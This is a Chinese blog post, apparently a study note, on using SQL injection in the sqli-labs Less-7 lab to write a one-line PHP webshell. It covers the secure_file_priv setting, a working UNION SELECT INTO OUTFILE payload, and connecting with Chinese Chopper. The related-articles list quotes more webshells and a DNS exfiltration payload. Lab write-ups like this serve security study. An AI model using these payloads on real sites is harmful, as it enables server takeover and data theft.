sql注入与一句话木马

最新推荐文章于 2024-04-12 02:53:44 发布
最新推荐文章于 2024-04-12 02:53:44 发布
阅读量3.2k 收藏 12
点赞数 1
分类专栏: 漏洞学习 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/118574560
版权

0x00 sql注入之一句话木马

首先介绍一下一句话木马:

一句话木马是一种基于
B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。

常见脚本的一句话木马:

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request (“pass”)%>
aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

0x01 注入条件

1.知道网站绝对路径
2,在mysql 中通过命令查看当前状态网站开启secure_file_priv开关需要是打开状态
secure_file_priv的状态有三种可能有三种状态

测试语句:show variables like’%secure%’
1.null 无法写入和读取
2.设置为一个目录名字,只允许在该路径下导入导出。
3.‘’空,可以在任意位置读取和写入

此处以为空值,则可以写入读取任何文件
如secure_file_priv结果不为空值,通过修改数据库ini文件加上语句

secure_file_priv= #文件中

[mysqld] secure_file_priv="" #文件尾
插入文件中

0x02 测试注入

这里实验sqli-less-7利用文件上传写入一句话木马并且连接
1)测试后发现闭合状态为?id=1‘)) 字段数为3
字段为3 闭合方式’))
2) 检测数据读写权限,打开数据库属于测试语句

show variables like'%secure%'

结果显示为不可读写,通过添加语句secure_file_priv=到数据库ini文件再次重启数据库显示权限已经打开

3)写入php一句话木马到网站关卡文件夹(此处因为已经知道测试环境的绝对地址,故省略地址爆破)


> 数据库下注入语句:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\shell.php";

url注入语句:http://127.0.0.1/sql1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["pass"]);?>' into outfile "E:\\phpstudy_pro\\WWW\\sql1\\Less-7\\shell.php"--+

此处文件地址添加两条杠防止被转义

3)使用getshell工具菜刀连接
连接地址

http://192.168.0.104/sqli/Less-7/shell.php
本地:http://127.0.0.1/sqli/Less-7/shell.php

菜刀连接

告白热
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
22-2.1 get基于报错的sql注入利用-读敏感文件和写入一句话木马
weixin_43263566的博客
01-25 234
通过这个查询语句,攻击者尝试将一段包含恶意PHP代码的字符串写入到一个指定的文件中,从而创建一个后门(backdoor)程序,可以让攻击者对受害者的服务器进行远程控制和操作。这是一个恶意的SQL注入攻击,它使用UNION注入的方式向数据库中插入一段包含恶意PHP代码的字符串,并将其存储到指定的文件中。因为我也不知道靶场的敏感文件是哪个,所以我就读取我们刚才注入的木马文件。判断MysQL的存储路径方便我们写入一句话马。双击刚才创建的连接就能进入目标的文件管理界面。在现实的情况下这种注入手段成功率很低。
第七天--文件上传漏洞
weixin_46653764的博客
06-04 412
在文件上传章节就用upload-labs靶场 一、文件上传基础及一句话木马 1、首先了解一下 “一句话木马“ 如:<?php @eval($_POST["pass"]) ?> 是最简单的一句话木马 那它是啥意思呢? 这是一段php代码,写在<?php ?>里面才能被服务器解析; @符号是不报错,即使执行错误也不报错 $_POST是用post方法接受变量pass的值 eval()函数是把字符串当成PHP代码执行 所以,利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以.
SQL注入篇——一句话木马
爱国小白帽
01-08 6356
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
SQL注入上传一句话木马
buffedon的博客
05-31 9046
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
sql注入之into outfile语句写入一句话木马_sql的into outfile(1)
最新发布
2301_77033340的博客
04-12 512
1、漏洞介绍into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
文件上传漏洞(一句话木马)-学习笔记
热门推荐
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1438
SQL注入上传一句话木马
一句话批量检测工具
06-22
通过该工具,用户可以一键式检查大量文件,识别其中是否存在可能的一句话木马或非法注入,从而提高安全防护能力。 【描述】"一句话批量检测工具" 的核心功能在于其高效的扫描算法,能够对多个文件进行深度分析,...
一句话的艺术-web提权.pdf
01-25
【一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
SQL注入与ASP木马上传的又一思路.txt
07-06
·中华隐者
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
一句话木马可以通过SQL注入漏洞或文件上传漏洞写入数据库或者网页文件。 SQL注入漏洞可以使用专用的工具,诸如啊D、明小子、SQLMap等,也可以自行手工检测漏洞,通过修改上传的url在最后加上特殊符号(单引号、逗号...
高级SQL注入拿shell,一般黑客不知道1
08-08
5. **写入一句话木马**:一旦找到Web根目录,攻击者通过`xp_cmdshell`执行命令,创建包含恶意脚本的一句话木马(如`a.asp`),等待受害者访问触发。 这个高级SQL注入方法展示了攻击者如何利用有限的权限(如public...
ACCESS导一句话拿webshell1
08-08
接着,向表"a"的"a"字段插入一句话木马,这里使用的是请求变量(#)执行代码: ```sql insert into a (a) values('(chr(35))%>') ``` 2. **导出为Excel文件**: 将表"a"的内容导出为一个Excel文件,利用以下SQL...
AWD攻略1
08-08
- 可能在index.php或Web根目录下直接放置一句话木马,降低挖掘难度。 5. **如何攻击**: - 拿flag的方式通常是通过HTTP请求获取或在系统根目录放置flag文件。 - 快速识别和利用漏洞至关重要,这需要熟练的搜索...
整理asp漏洞与入侵方式.doc
01-15
0x00 前言 3 0x10 WEBDAV 3 0x20 IIS6短文件名漏洞 3 0x30 网站源代码 4 0x40 网站备份文件、说明...0xCC 带有一句话木马的数据库 11 0xCD 杨凡大牛发出的文档 12 0xCE Upload_Attack_Framework文档 12 0xD0参考资料 12
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
中国蚁剑则用于上传木马、执行命令和提权,例如,作者提到的“一句话木马”是Web渗透中常用的一种技巧,可以用来获得远程命令执行的能力。 提权是渗透测试中的关键环节。在文中,作者提到了蚁剑的使用来提升权限,...
文件上传漏洞练习—upload-labs通关记录(踩坑!!!)
Wuxia_Bai的博客
12-24 895
一步步做下来的真实记录,希望能帮助大家,避免踩坑!!!一个简单的记录,部分关卡需要进行相应配置,均已说明。
SQL注入一句话木马(load_file/out file)
初学者L_言的博客
11-26 8623
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
php mysql 注入一句话木马_渗透技术--SQL注入一句话木马原理
weixin_39800387的博客
02-19 2283
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
一句话注入木马的实例 和 预防注入代码
05-26
一句话注入木马的实例:`eval($_POST['cmd']);` 预防注入代码: 1. 输入过滤:对输入的数据进行过滤,如只允许输入数字、字母等特定字符,或使用正则表达式匹配。 2. 函数过滤:禁用危险函数,如exec、system等。 3. 数据库操作:使用预处理语句和参数化查询来防止 SQL 注入。 4. 输出过滤:对输出的数据进行过滤,如转义特殊字符、HTML 标签等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值